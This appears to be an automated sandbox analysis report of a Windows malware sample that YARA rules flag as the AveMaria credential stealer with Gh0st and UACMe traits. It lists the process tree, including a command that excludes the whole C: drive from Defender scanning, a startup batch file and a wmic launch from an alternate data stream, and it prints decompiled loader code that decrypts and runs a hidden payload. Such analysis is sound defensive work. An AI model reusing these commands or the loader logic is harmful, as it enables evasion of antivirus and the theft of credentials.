                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000003.271032927.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.271032927.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.271032927.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.271207797.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.271207797.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.298671123.00000000035AF000.00000002.00001000.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.298671123.00000000035AF000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.271113826.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000003.271113826.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.271046859.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000003.271046859.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low

                    Target ID:1
                    Start time:21:37:36
                    Start date:15/05/2022
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:powershell Add-MpPreference -ExclusionPath C:\
                    Imagebase:0x9b0000
                    File size:430592 bytes
                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Reputation:high

                    Target ID:2
                    Start time:21:37:37
                    Start date:15/05/2022
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7c9170000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:3
                    Start time:21:37:38
                    Start date:15/05/2022
                    Path:C:\ProgramData\windowupdate.exe
                    Wow64 process (32bit):true
                    Commandline:C:\ProgramData\windowupdate.exe
                    Imagebase:0xd30000
                    File size:2054656 bytes
                    MD5 hash:35ED3FE203FABDE1B0D353815F9A273B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.525655922.00000000038E4000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000002.525655922.00000000038E4000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.310491730.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000003.310491730.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.310491730.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.310491730.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.310518053.0000000001080000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.310518053.0000000001080000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.310053824.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000003.310053824.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.310053824.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.310053824.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000003.310397605.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000003.310397605.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.310397605.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000003.00000003.310397605.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000002.525763010.0000000003A1F000.00000002.00001000.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000002.525763010.0000000003A1F000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 17%, ReversingLabs
                    Reputation:low

                    Target ID:6
                    Start time:21:37:50
                    Start date:15/05/2022
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" "
                    Imagebase:0x7ff670f90000
                    File size:273920 bytes
                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:8
                    Start time:21:37:50
                    Start date:15/05/2022
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7c9170000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:9
                    Start time:21:37:51
                    Start date:15/05/2022
                    Path:C:\Windows\System32\wbem\WMIC.exe
                    Wow64 process (32bit):false
                    Commandline:wmic process call create '"C:\ProgramData:ApplicationData"'
                    Imagebase:0x7ff630f20000
                    File size:521728 bytes
                    MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    Target ID:13
                    Start time:21:37:55
                    Start date:15/05/2022
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:powershell Add-MpPreference -ExclusionPath C:\
                    Imagebase:0x9b0000
                    File size:430592 bytes
                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Reputation:high

                    Target ID:14
                    Start time:21:37:55
                    Start date:15/05/2022
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\System32\cmd.exe
                    Imagebase:0xc20000
                    File size:232960 bytes
                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:15
                    Start time:21:37:55
                    Start date:15/05/2022
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7c9170000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:16
                    Start time:21:37:56
                    Start date:15/05/2022
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7c9170000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:18
                    Start time:21:38:18
                    Start date:15/05/2022
                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Imagebase:0x7ff674600000
                    File size:488448 bytes
                    MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                    Has elevated privileges:true
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                      Execution Graph

                      Execution Coverage:0.7%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:3.6%
                      Total number of Nodes:253
                      Total number of Limit Nodes:13
36146->36094 36147->36098 36148->36071 36149->36085 36150->36133 36151->36135 36152->36110 36342 96c740 52 API calls pre_c_initialization 36343 962940 22 API calls 10 library calls 36346 94d570 62 API calls ~Module 36347 946970 36 API calls ~Module 36348 954770 45 API calls 3 library calls 36349 959b70 7 API calls ___CxxFrameHandler 36350 96cd70 22 API calls 3 library calls 36352 941360 35 API calls ~Module 36353 941560 47 API calls ~Module 36354 94f760 42 API calls 2 library calls 36356 955360 73 API calls 4 library calls

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 145 958c70-958c7f SetUnhandledExceptionFilter
                      C-Code - Quality: 100%
                      			E00958C70() {
                      				_Unknown_base(*)()* _t1;
                      
                      				_t1 = SetUnhandledExceptionFilter(E00958C90); // executed
                      				return _t1;
                      			}

                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(00958C90,?,009584F8), ref: 00958C78
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: ef7df78354b0eab6ee781e67f3f77da4d67d855387475ebbc5fa98fc7e558717
                      • Instruction ID: 89f14b425a8d667a0a05f2f4749cc16a88c73a7ed6fa1fa5d530d1d3b11ac96d
                      • Opcode Fuzzy Hash: ef7df78354b0eab6ee781e67f3f77da4d67d855387475ebbc5fa98fc7e558717
                      • Instruction Fuzzy Hash: CEA022300CE30CB30B0023C3FC0A80A3B0CEA82A2B3000082FA0C00002CE82308003B2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 80%
                      			E009CF830(void* __ebx, void* __edi, void* __esi) {
                      				signed int _v8;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				char _v33;
                      				char _v34;
                      				char _v35;
                      				char _v36;
                      				char _v37;
                      				char _v38;
                      				char _v39;
                      				char _v40;
                      				char _v41;
                      				char _v42;
                      				char _v43;
                      				char _v44;
                      				char _v45;
                      				char _v46;
                      				char _v47;
                      				char _v48;
                      				char _v49;
                      				char _v50;
                      				char _v51;
                      				char _v52;
                      				char _v53;
                      				char _v54;
                      				char _v55;
                      				char _v56;
                      				char _v57;
                      				char _v58;
                      				char _v59;
                      				char _v60;
                      				char _v61;
                      				char _v62;
                      				char _v63;
                      				char _v64;
                      				char _v65;
                      				char _v66;
                      				char _v67;
                      				char _v68;
                      				char _v69;
                      				char _v70;
                      				char _v71;
                      				char _v72;
                      				char _v73;
                      				char _v74;
                      				char _v75;
                      				char _v76;
                      				char _v77;
                      				char _v78;
                      				char _v79;
                      				char _v80;
                      				char _v81;
                      				char _v82;
                      				char _v83;
                      				char _v84;
                      				char _v85;
                      				char _v86;
                      				char _v87;
                      				char _v88;
                      				char _v89;
                      				char _v90;
                      				char _v91;
                      				char _v92;
                      				char _v93;
                      				char _v94;
                      				char _v95;
                      				char _v96;
                      				char _v97;
                      				char _v98;
                      				char _v99;
                      				char _v100;
                      				char _v101;
                      				char _v102;
                      				char _v103;
                      				char _v104;
                      				char _v105;
                      				char _v106;
                      				char _v107;
                      				char _v108;
                      				char _v109;
                      				char _v110;
                      				char _v111;
                      				char _v112;
                      				char _v113;
                      				char _v114;
                      				char _v115;
                      				char _v116;
                      				char _v117;
                      				char _v118;
                      				char _v119;
                      				char _v120;
                      				char _v121;
                      				char _v122;
                      				char _v123;
                      				char _v124;
                      				char _v125;
                      				char _v126;
                      				char _v127;
                      				char _v128;
                      				char _v129;
                      				char _v130;
                      				char _v131;
                      				char _v132;
                      				intOrPtr _v140;
                      				long _v148;
                      				void* _v156;
                      				struct HWND__* _v160;
                      				signed int _v164;
                      				struct HWND__* _v168;
                      				intOrPtr _v172;
                      				signed int _v176;
                      				struct HWND__* _v180;
                      				signed int _v184;
                      				signed int _v188;
                      				char _v192;
                      				signed int _t208;
                      				void* _t210;
                      				int _t213;
                      				void* _t239;
                      				void* _t243;
                      				void* _t244;
                      				int _t247;
                      				int _t251;
                      				int _t255;
                      				int _t256;
                      				int _t259;
                      				void* _t266;
                      				char _t323;
                      				void* _t325;
                      				int _t328;
                      				int _t332;
                      				void* _t336;
                      				void* _t337;
                      				signed int _t346;
                      				void* _t347;
                      				void* _t348;
                      
                      				_t266 = __ebx;
                      				_t336 =  &_v192;
                      				memset(_t336, 0xcccccccc, 0x2f << 2);
                      				_t348 = _t347 + 0xc;
                      				_t337 = _t336 + 0x2f;
                      				_t208 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t208 ^ _t346;
                      				_v24 = 0xa06998;
                      				_v28 = 0x3e800;
                      				_v132 = 0xa8;
                      				_v131 = 0xc1;
                      				_v130 = 0xd3;
                      				_v129 = 0x97;
                      				_v128 = 0x13;
                      				_v127 = 0xba;
                      				_v126 = 0x79;
                      				_v125 = 0x46;
                      				_v124 = 0x9d;
                      				_v123 = 0x64;
                      				_v122 = 0x3a;
                      				_v121 = 0xae;
                      				_v120 = 0x23;
                      				_v119 = 0x90;
                      				_v118 = 0xb5;
                      				_v117 = 0xfc;
                      				_v116 = 0x83;
                      				_v115 = 0x78;
                      				_v114 = 0x2b;
                      				_v113 = 0x4c;
                      				_v112 = 0xac;
                      				_v111 = 0xa2;
                      				_v110 = 0x16;
                      				_v109 = 0xa;
                      				_v108 = 0x76;
                      				_v107 = 0xa6;
                      				_v106 = 0x54;
                      				_v105 = 0xd3;
                      				_v104 = 0xbe;
                      				_v103 = 0xcc;
                      				_v102 = 0x92;
                      				_v101 = 0x26;
                      				_v100 = 0x94;
                      				_v99 = 9;
                      				_v98 = 0x69;
                      				_v97 = 0xb1;
                      				_v96 = 0xfb;
                      				_v95 = 0x13;
                      				_v94 = 0xdc;
                      				_v93 = 0xb2;
                      				_v92 = 0x68;
                      				_v91 = 0x9a;
                      				_v90 = 0xe4;
                      				_v89 = 0x21;
                      				_v88 = 0x20;
                      				_v87 = 0x4c;
                      				_v86 = 0x88;
                      				_v85 = 0x43;
                      				_v84 = 0x8d;
                      				_v83 = 0xe;
                      				_v82 = 0x36;
                      				_v81 = 0x6b;
                      				_v80 = 0x79;
                      				_v79 = 0xd9;
                      				_v78 = 0xd1;
                      				_v77 = 0x58;
                      				_v76 = 0x44;
                      				_v75 = 0x4d;
                      				_v74 = 0xf6;
                      				_v73 = 0x52;
                      				_v72 = 0x14;
                      				_v71 = 0x6e;
                      				_v70 = 0x8a;
                      				_v69 = 0xd5;
                      				_v68 = 0x1b;
                      				_v67 = 0xff;
                      				_v66 = 0x3c;
                      				_v65 = 0x1c;
                      				_v64 = 0xd1;
                      				_v63 = 0xfb;
                      				_v62 = 0x91;
                      				_v61 = 0x58;
                      				_v60 = 0x30;
                      				_v59 = 0x57;
                      				_v58 = 4;
                      				_v57 = 0x8f;
                      				_v56 = 0x32;
                      				_v55 = 0xd8;
                      				_v54 = 0xe9;
                      				_v53 = 0xcd;
                      				_v52 = 0x46;
                      				_v51 = 0x90;
                      				_v50 = 0xee;
                      				_v49 = 0x94;
                      				_v48 = 0x63;
                      				_v47 = 0xbb;
                      				_v46 = 0xa;
                      				_v45 = 0xc0;
                      				_v44 = 0x9a;
                      				_v43 = 0x50;
                      				_v42 = 0xf1;
                      				_v41 = 0xa9;
                      				_v40 = 0xa9;
                      				_v39 = 0xb0;
                      				_v38 = 0x69;
                      				_v37 = 0x1d;
                      				_v36 = 0x85;
                      				_v35 = 4;
                      				_v34 = 0x58;
                      				_v33 = 0x9d;
                      				_t210 = VirtualAlloc(0,  &M00A00000, 0x3000, 0x40); // executed
                      				_v140 = E009D1520(_t210, _t348 - _t348);
                      				_v148 = 0;
                      				_v156 = MessageBoxA;
                      				_t213 = VirtualProtect(_v156, 0x100, 0x40,  &_v148); // executed
                      				E009D1520(_t213, _t348 - _t348);
                      				 *((char*)(_t346 + 0xfffffffffffffff4)) =  *_v156;
                      				 *((char*)(_t346 + 0xbadba1)) =  *((intOrPtr*)(_v156 + (1 << 0)));
                      				 *((char*)(_t346 + 0xbadba1)) =  *((intOrPtr*)(_v156 + (1 << 1)));
                      				 *((char*)(_t346 + 0xfffffffffffffff7)) =  *((intOrPtr*)(_v156 + 3));
                      				 *_v156 = 0xc2;
                      				 *((char*)(_v156 + (1 << 0))) = 0x10;
                      				 *((char*)(_v156 + (1 << 1))) = 0;
                      				 *((char*)(_v156 + 3)) = 0x90;
                      				_v160 = 0;
                      				while(_v160 <= _v28 - 1) {
                      					_v164 =  !( *(_v24 + (_v28 - 1 - _v160) * 4));
                      					if(_v164 != 0) {
                      						 *((char*)(_v140 + _v160)) = _v164;
                      					}
                      					_v160 =  &(_v160->i);
                      				}
                      				_v168 = 0;
                      				while(1) {
                      					__eflags = _v168 - 0xeac40;
                      					if(_v168 >= 0xeac40) {
                      						break;
                      					}
                      					_v180 = 0;
                      					while(1) {
                      						__eflags = _v180 - 0x3ff;
                      						if(_v180 >= 0x3ff) {
                      							break;
                      						}
                      						_t256 = MessageBoxA(0, "1", "1", 1);
                      						__eflags = _t348 - _t348;
                      						E009D1520(_t256, _t348 - _t348);
                      						_v172 = _v28;
                      						__eflags = _v28 - 0x1f9;
                      						if(_v28 >= 0x1f9) {
                      							_v176 = 0x64;
                      						} else {
                      							_t259 = MessageBoxA(0, "1", "1", 1);
                      							__eflags = _t348 - _t348;
                      							E009D1520(_t259, _t348 - _t348);
                      							_v176 = 0;
                      						}
                      						_t332 =  &(_v180->i);
                      						__eflags = _t332;
                      						_v180 = _t332;
                      					}
                      					_v168 =  &(_v168->i);
                      				}
                      				_v184 = 0;
                      				while(1) {
                      					__eflags = _v184 - _v172;
                      					if(_v184 >= _v172) {
                      						break;
                      					}
                      					_t247 = MessageBoxA(0, "1", "1", 1);
                      					__eflags = _t348 - _t348;
                      					E009D1520(_t247, _t348 - _t348);
                      					asm("cdq");
                      					_v188 = _v184 % _v176;
                      					__eflags = _v184 - 0x1000000;
                      					if(_v184 != 0x1000000) {
                      						_t255 = _v140 + _v184;
                      						__eflags = _t255;
                      						 *_t255 =  *(_v140 + _v184) ^  *(_t346 + _v188 - 0x80);
                      					}
                      					_t251 = MessageBoxA(0, "1", "1", 2);
                      					__eflags = _t348 - _t348;
                      					E009D1520(_t251, _t348 - _t348);
                      					_t328 = _v184 + 1;
                      					__eflags = _t328;
                      					_v184 = _t328;
                      				}
                      				_v192 = _v140;
                      				 *_v156 =  *((intOrPtr*)(_t346 + 0xfffffffffffffff4));
                      				 *((char*)(_v156 + (1 << 0))) =  *((intOrPtr*)(_t346 + 0xbadba1));
                      				 *((char*)(_v156 + (1 << 1))) =  *((intOrPtr*)(_t346 + 0xbadba1));
                      				_t323 =  *((intOrPtr*)(_t346 + 0xfffffffffffffff7));
                      				 *((char*)(_v156 + 3)) = _t323;
                      				_t341 = _t348;
                      				_t239 = _v192();
                      				__eflags = _t348 - _t348;
                      				E009D1520(_t239, _t348 - _t348);
                      				while(1) {
                      					__eflags = 1;
                      					if(1 == 0) {
                      						break;
                      					}
                      					_t341 = _t348;
                      					Sleep(0x320); // executed
                      					__eflags = _t348 - _t348;
                      					E009D1520(1, _t348 - _t348);
                      				}
                      				E009D14C0(_t346, 0x9cfdc0);
                      				_t243 = 1;
                      				_t325 = _t323;
                      				_t244 = E00957280(_t243, _t266, _v8 ^ _t346, _t325, _t337, _t341);
                      				__eflags = _t346 - _t348 + 0xbc;
                      				return E009D1520(_t244, _t346 - _t348 + 0xbc);
                      			}

                      APIs
                      • VirtualAlloc.KERNEL32(00000000,3\atlmfc\include\atlsimpcoll.h,00003000,00000040,?), ref: 009CFA05
                      • VirtualProtect.KERNEL32(?,00000100,00000040,00000000), ref: 009CFA44
                      • MessageBoxA.USER32 ref: 009CFBBD
                      • MessageBoxA.USER32 ref: 009CFBEC
                      • MessageBoxA.USER32 ref: 009CFC62
                      • MessageBoxA.USER32 ref: 009CFCC8
                      • Sleep.KERNEL32(00000320), ref: 009CFD83
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 009CFD9C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Message$Virtual$AllocCheckProtectSleepStackVars@8
                      • String ID: $!$#$&$+$0$2$3\atlmfc\include\atlsimpcoll.h$6$:$<$C$D$F$F$L$L$M$P$R$T$W$X$X$X$c$d$d$h$i$i$k$n$v$x$y$y
                      • API String ID: 657854547-3520396359
                      • Opcode ID: 1b705d5d320468a724e47a27574ddfeaa86c3ea977952b5a8b9d9228cd1a02dc
                      • Instruction ID: 4a41e04a00dc5a926d84f231f035e15748ce68cf83c0626d9acd0b6195e18c88
                      • Opcode Fuzzy Hash: 1b705d5d320468a724e47a27574ddfeaa86c3ea977952b5a8b9d9228cd1a02dc
                      • Instruction Fuzzy Hash: 83027D30D087D98EDB21CBBC88547DDBF716B52324F0442D9E5A96B3D2C7B50985CBA2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 84%
                      			E0094CB60(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				struct HWND__* _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				char _v30;
                      				char _v32;
                      				MSG* _v40;
                      				struct tagMSG _v72;
                      				intOrPtr _v80;
                      				intOrPtr _v84;
                      				void _v88;
                      				short _t49;
                      				MSG* _t52;
                      				struct HWND__* _t54;
                      				void* _t56;
                      				intOrPtr _t58;
                      				int _t63;
                      				long _t65;
                      				void* _t67;
                      				void* _t68;
                      				void* _t70;
                      				void* _t71;
                      				intOrPtr _t72;
                      				intOrPtr _t82;
                      				MSG* _t98;
                      				void* _t110;
                      				void* _t111;
                      				void* _t112;
                      				void* _t113;
                      
                      				_t78 = __ebx;
                      				_push(__ecx);
                      				_t102 =  &_v88;
                      				memset( &_v88, 0xcccccccc, 0x15 << 2);
                      				_t112 = _t111 + 0xc;
                      				_pop(_t82);
                      				_v8 = _t82;
                      				_v12 = E009D1520(GetCommandLineA(), _t112 - _t112);
                      				_t106 = _t112;
                      				__imp__CoInitialize(0); // executed
                      				E009D1520(_t47, _t112 - _t112);
                      				_v16 = 0;
                      				_v24 = 1;
                      				_t49 =  *((intOrPtr*)("-/")); // 0x2f2d
                      				_v32 = _t49;
                      				_t83 =  *0x9ffd96; // 0x0
                      				_v30 = _t83;
                      				E009CF830(__ebx, _t102 + 0x15, _t112); // executed
                      				_t98 =  &_v32;
